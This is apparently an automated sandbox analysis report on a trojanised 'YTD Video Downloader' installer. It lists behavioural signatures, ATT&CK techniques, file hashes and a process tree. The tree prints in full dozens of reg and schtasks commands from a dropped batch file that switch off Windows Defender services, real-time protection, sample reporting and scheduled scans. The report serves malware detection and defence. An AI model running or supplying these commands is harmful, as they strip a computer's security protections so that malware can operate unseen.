7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e

Analysis

max time kernel
223s
max time network
236s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
07-05-2022 23:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.exe
Size

15.7MB
MD5

9c6a1c8f692c9ee5462f2ddbe00a4e48
SHA1

2d7b73522315590e152f4f100319e8dbf0453b54
SHA256

7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e
SHA512

239a742cb52697ded97182a9f10616b1a0fcd561aab6ce7adc342fb07cc74b355aa3e2edc2532ae1ed3748bcc90f503c4d316b29e207e39b3d896ff22eed4d17

Score

10^/10

evasion themida trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Modifies security service 2 TTPs 1 IoCs
evasion

Modify Registry
T1112

Modify Existing Service
T1031

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Executes dropped EXE 10 IoCs

Processes:

7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.tmpYTD.Video.Downloader.5.9.17.exeYTD.Video.Downloader.5.9.17.tmp7z.exe7z.exe7z.exe7z.exe7z.exe7z.exetGBpax_SqZ.exe

pid	process
216	7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.tmp
1624	YTD.Video.Downloader.5.9.17.exe
4088	YTD.Video.Downloader.5.9.17.tmp
3980	7z.exe
2672	7z.exe
4732	7z.exe
536	7z.exe
780	7z.exe
1532	7z.exe
4928	tGBpax_SqZ.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

tGBpax_SqZ.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	tGBpax_SqZ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	tGBpax_SqZ.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.tmp

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.tmp

Loads dropped DLL 11 IoCs

Processes:

7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.tmpYTD.Video.Downloader.5.9.17.tmp7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe

pid	process
216	7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.tmp
4088	YTD.Video.Downloader.5.9.17.tmp
4088	YTD.Video.Downloader.5.9.17.tmp
4088	YTD.Video.Downloader.5.9.17.tmp
4088	YTD.Video.Downloader.5.9.17.tmp
3980	7z.exe
2672	7z.exe
4732	7z.exe
536	7z.exe
780	7z.exe
1532	7z.exe

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\ProgramData\ksRHo\extracted\tGBpax_SqZ.exe	themida
C:\ProgramData\ksRHo\tGBpax_SqZ.exe	themida

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

tGBpax_SqZ.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA tGBpax_SqZ.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	tGBpax_SqZ.exe

Drops file in Program Files directory 2 IoCs

Processes:

7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.tmp

description	ioc	process
File opened for modification	C:\Program Files (x86)\YTD.Video.Downloader.5.9.17.exe	7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.tmp
File created	C:\Program Files (x86)\is-9QJN3.tmp	7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

708 timeout.exe

pid	process
708	timeout.exe

Modifies registry class 1 IoCs

Processes:

7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.tmp

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\Local Settings	7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.tmp

Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.tmpYTD.Video.Downloader.5.9.17.tmp

pid	process
216	7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.tmp
216	7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.tmp
4088	YTD.Video.Downloader.5.9.17.tmp
4088	YTD.Video.Downloader.5.9.17.tmp

Suspicious use of AdjustPrivilegeToken 24 IoCs

Processes:

7z.exe7z.exe7z.exe7z.exe7z.exe7z.exe

description	pid	process
Token: SeRestorePrivilege	3980	7z.exe
Token: 35	3980	7z.exe
Token: SeSecurityPrivilege	3980	7z.exe
Token: SeSecurityPrivilege	3980	7z.exe
Token: SeRestorePrivilege	2672	7z.exe
Token: 35	2672	7z.exe
Token: SeSecurityPrivilege	2672	7z.exe
Token: SeSecurityPrivilege	2672	7z.exe
Token: SeRestorePrivilege	4732	7z.exe
Token: 35	4732	7z.exe
Token: SeSecurityPrivilege	4732	7z.exe
Token: SeSecurityPrivilege	4732	7z.exe
Token: SeRestorePrivilege	536	7z.exe
Token: 35	536	7z.exe
Token: SeSecurityPrivilege	536	7z.exe
Token: SeSecurityPrivilege	536	7z.exe
Token: SeRestorePrivilege	780	7z.exe
Token: 35	780	7z.exe
Token: SeSecurityPrivilege	780	7z.exe
Token: SeSecurityPrivilege	780	7z.exe
Token: SeRestorePrivilege	1532	7z.exe
Token: 35	1532	7z.exe
Token: SeSecurityPrivilege	1532	7z.exe
Token: SeSecurityPrivilege	1532	7z.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.tmp

pid process

216 7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.tmp

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.exe7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.tmpYTD.Video.Downloader.5.9.17.exeWScript.execmd.exe

description	pid	process	target process
PID 2360 wrote to memory of 216	2360	7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.exe	7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.tmp
PID 2360 wrote to memory of 216	2360	7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.exe	7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.tmp
PID 2360 wrote to memory of 216	2360	7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.exe	7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.tmp
PID 216 wrote to memory of 1624	216	7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.tmp	YTD.Video.Downloader.5.9.17.exe
PID 216 wrote to memory of 1624	216	7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.tmp	YTD.Video.Downloader.5.9.17.exe
PID 216 wrote to memory of 1624	216	7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.tmp	YTD.Video.Downloader.5.9.17.exe
PID 1624 wrote to memory of 4088	1624	YTD.Video.Downloader.5.9.17.exe	YTD.Video.Downloader.5.9.17.tmp
PID 1624 wrote to memory of 4088	1624	YTD.Video.Downloader.5.9.17.exe	YTD.Video.Downloader.5.9.17.tmp
PID 1624 wrote to memory of 4088	1624	YTD.Video.Downloader.5.9.17.exe	YTD.Video.Downloader.5.9.17.tmp
PID 216 wrote to memory of 852	216	7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.tmp	WScript.exe
PID 216 wrote to memory of 852	216	7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.tmp	WScript.exe
PID 216 wrote to memory of 852	216	7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.tmp	WScript.exe
PID 852 wrote to memory of 3892	852	WScript.exe	cmd.exe
PID 852 wrote to memory of 3892	852	WScript.exe	cmd.exe
PID 852 wrote to memory of 3892	852	WScript.exe	cmd.exe
PID 3892 wrote to memory of 3428	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 3428	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 3428	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 392	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 392	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 392	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 4948	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 4948	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 4948	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 4768	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 4768	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 4768	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 552	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 552	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 552	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 1304	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 1304	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 1304	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 1012	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 1012	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 1012	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 1160	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 1160	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 1160	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 5012	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 5012	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 5012	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 5004	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 5004	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 5004	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 1720	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 1720	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 1720	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 2064	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 2064	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 2064	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 4932	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 4932	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 4932	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 2516	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 2516	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 2516	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 4864	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 4864	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 4864	3892	cmd.exe	reg.exe
PID 3892 wrote to memory of 1456	3892	cmd.exe	schtasks.exe
PID 3892 wrote to memory of 1456	3892	cmd.exe	schtasks.exe
PID 3892 wrote to memory of 1456	3892	cmd.exe	schtasks.exe
PID 3892 wrote to memory of 3752	3892	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.exe
"C:\Users\Admin\AppData\Local\Temp\7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2360

C:\Users\Admin\AppData\Local\Temp\is-74QNP.tmp\7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.tmp
"C:\Users\Admin\AppData\Local\Temp\is-74QNP.tmp\7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.tmp" /SL5="$180022,15741142,731648,C:\Users\Admin\AppData\Local\Temp\7f579667f96830454c571eb8661ea79878fe10dc6ac5a2155ebfec175704a50e.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:216

C:\Program Files (x86)\YTD.Video.Downloader.5.9.17.exe
"C:\Program Files (x86)\YTD.Video.Downloader.5.9.17.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1624

C:\Users\Admin\AppData\Local\Temp\is-ULH52.tmp\YTD.Video.Downloader.5.9.17.tmp
"C:\Users\Admin\AppData\Local\Temp\is-ULH52.tmp\YTD.Video.Downloader.5.9.17.tmp" /SL5="$301D8,8824992,64512,C:\Program Files (x86)\YTD.Video.Downloader.5.9.17.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4088

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\ksRHo\MMF.vbs"
3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:852

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ksRHo\DisableOAVProtection.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:3892

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
5⤵
PID:3428

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
5⤵
PID:1304

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
5⤵
PID:4864

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
5⤵
PID:1456

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
5⤵
PID:2516

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
5⤵
PID:4932

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
5⤵
PID:2064

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
5⤵
PID:1720

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
5⤵
PID:5004

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
5⤵
PID:5012

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
5⤵
PID:1160

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
5⤵
PID:4448

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:1816

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:3064

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
5⤵
- Modifies security service
PID:3348

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:2272

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:4860

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:4820

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
5⤵
PID:64

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
5⤵
PID:4612

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
5⤵
PID:4840

C:\Windows\SysWOW64\reg.exe
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
5⤵
PID:2096

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
5⤵
PID:4144

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
5⤵
PID:3136

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
5⤵
PID:3336

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
5⤵
PID:2592

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
5⤵
PID:3752

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
5⤵
PID:1012

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
5⤵
PID:552

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
5⤵
PID:4768

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
5⤵
PID:4948

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
5⤵
PID:392

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ksRHo\DiskRemoval.bat" "
4⤵
PID:2776

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ksRHo\main.bat" "
4⤵
PID:3092

C:\ProgramData\ksRHo\7z.exe
7z.exe e extracted/file_3.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:536

C:\ProgramData\ksRHo\7z.exe
7z.exe e extracted/file_2.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:780

C:\ProgramData\ksRHo\7z.exe
7z.exe e extracted/file_4.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4732

C:\ProgramData\ksRHo\7z.exe
7z.exe e extracted/file_1.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1532

C:\ProgramData\ksRHo\tGBpax_SqZ.exe
"tGBpax_SqZ.exe"
5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:4928

C:\Windows\SysWOW64\timeout.exe
timeout /T 60 /NOBREAK
1⤵
- Delays execution with timeout.exe
PID:708

C:\ProgramData\ksRHo\7z.exe
7z.exe e file.zip -p___________5230pwd29950pwd13288___________ -oextracted
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3980

C:\ProgramData\ksRHo\7z.exe
7z.exe e extracted/file_5.zip -oextracted
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2672

C:\Windows\SysWOW64\mode.com
mode 65,10
1⤵
PID:1156

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Credential Access

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\YTD.Video.Downloader.5.9.17.exe
Filesize
8.7MB

MD5
8c9c936650d3d784379ac48072e97880

SHA1
6861bb6a4e72d8559c0aecf03c83a5051bde2827

SHA256
c6809a339ffd1ad0f72348719ad601947d5a15cc1ad1f1016f28cf2843528222

SHA512
77a6be698f578e059f5399cc267fe9af87b583a6402fab80afa3dd24e3cfd8eef4d0fdc34cee4d452d952f1bf07af066a286fe09074b9cd87934551643cda8d1

Download Submit
C:\Program Files (x86)\YTD.Video.Downloader.5.9.17.exe
Filesize
8.7MB

MD5
8c9c936650d3d784379ac48072e97880

SHA1
6861bb6a4e72d8559c0aecf03c83a5051bde2827

SHA256
c6809a339ffd1ad0f72348719ad601947d5a15cc1ad1f1016f28cf2843528222

SHA512
77a6be698f578e059f5399cc267fe9af87b583a6402fab80afa3dd24e3cfd8eef4d0fdc34cee4d452d952f1bf07af066a286fe09074b9cd87934551643cda8d1

Download Submit
C:\ProgramData\ksRHo\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\ksRHo\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\ksRHo\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\ksRHo\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\ksRHo\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\ksRHo\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\ksRHo\7z.dll
Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\ksRHo\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\ksRHo\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\ksRHo\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\ksRHo\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\ksRHo\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\ksRHo\7z.exe
Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
